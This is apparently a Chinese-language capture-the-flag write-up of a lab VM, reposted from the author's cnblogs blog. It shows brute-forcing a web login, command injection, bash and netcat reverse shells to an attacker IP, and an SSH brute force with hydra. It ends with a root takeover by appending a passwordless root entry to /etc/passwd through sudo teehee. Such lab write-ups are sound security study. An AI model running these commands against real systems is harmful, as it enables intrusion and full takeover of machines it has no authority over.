![](/images/head.png)
来自之前cnblog的博客
源地址:https://www.cnblogs.com/This-is-Y/p/13347213.html
下载,安装(vmware直接导入文件),桥接
kali开始nmap扫描
nmap -sP 192.168.123.0/24
![](1503868-20200719164434709-620316570.png)
找到目标ip:192.168.123.9
浏览器访问,就一个登陆页面
![](1503868-20200719164509154-76924117.png)
nmap扫描端口;只有22和80
可以确定是linux了(废话)
![](1503868-20200722101755939-1486713193.png)
再dirsearch扫描目录
![](1503868-20200719164921773-715340004.png)
也没有有用的信息
先试试注入,手注和sqlmap都没找出什么来
burp抓包跑字典暴力破解再试试看
![](1503868-20200722083839127-1750061235.png)
暴力破解出了结果
admin
happy
登陆后的页面,
![](1503868-20200722083915861-231379410.png)
只有一个command,点进去,有3个命令供执行
ls -l 显示目录内容列表
du -h 显示每个文件和目录的磁盘使用情况
df -h 显示磁盘相关信息
![](1503868-20200722084039243-1322324194.png)
试试抓包,执行命令作为明文参数,修改成别的,发现也可以执行(这里我是换成了dir)
![](1503868-20200722084926019-1762086525.png)
验证其可行性后,试试看别的命令,cat command.php
可以看到执行命令的是这个shell_exec()函数
![](1503868-20200722085951661-107414924.png)
用户是www-data,权限组在33
没有写文件的权限
直接反弹shell
![](1503868-20200722092238878-1679955723.png)
看上去像是把命令里的&符当成分隔符了。编码一下就解决了
bash+-i+>%26%2Fdev%2Ftcp%2F192.168.123.42%2F1234+0>%261
然鹅还是反弹不出来,看不到报错,也不知道是什么的原因
换nc反弹
nc 192.168.123.41 1234 -e /bin/bash
反弹成功
![](1503868-20200722095309079-1344845192.png)
查看是否有可用于suid提权的文件
find / -user root -perm -4000 -print 2>/dev/null
![](1503868-20200722101241845-1809258723.png)
没找到
sudo也用不了
uname -a和lsb_release -a查看系统版本
![](1503868-20200722101110053-1570558000.png)
去sploitdb里面找是否有可以用的漏洞
有一些关于ssh的漏洞,但是在反弹回来的shell下,我没有权限wget下载文件
看了一些别人的博客,到/home目录下,有三个用户
![](1503868-20200722103655965-1633930654.png)
但是只有jim下面有文件
backups里面有一个oldpasswd.bak,是一些密码,估计是要爆破
mbox打不开,没有权限
test.sh文件内容像是提示
![](1503868-20200722104744291-1768662936.png)
先尝试爆破
把oldpasswords.bak中的数据保存下来(jim.txt)
再使用hydra进行爆破
hydra -l jim -P jim.txt 192.168.123.9 ssh
不到半分钟就出来了
![](1503868-20200722105446312-1994701178.png)
密码:jibril04
通过ssh登陆jim
查看mbox文件内容
![](1503868-20200722105625407-610577568.png)
看内容是一封邮件
从jim这边查找文件,再var/mail下看到一封jim的邮件,打开
![](1503868-20200722112546396-1552346468.png)
得到了用户charles的密码^xHhA&hvim0y
试着登陆一下
![](1503868-20200722112713063-2099022073.png)
成功
跟着这个思路,回到www-data,查看www-data文件,
![](1503868-20200722113021374-1393808338.png)
有很多封邮件,但是都没用
登陆到charles后,可以使用sudo
用sudo -l看一下,命令teehee不需要密码就可以执行,用
echo “admin::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
在passwd下面添加一个没有密码的root用户,
然后就可以在/root下找到flag了
![](1503868-20200722225054047-631918545.png)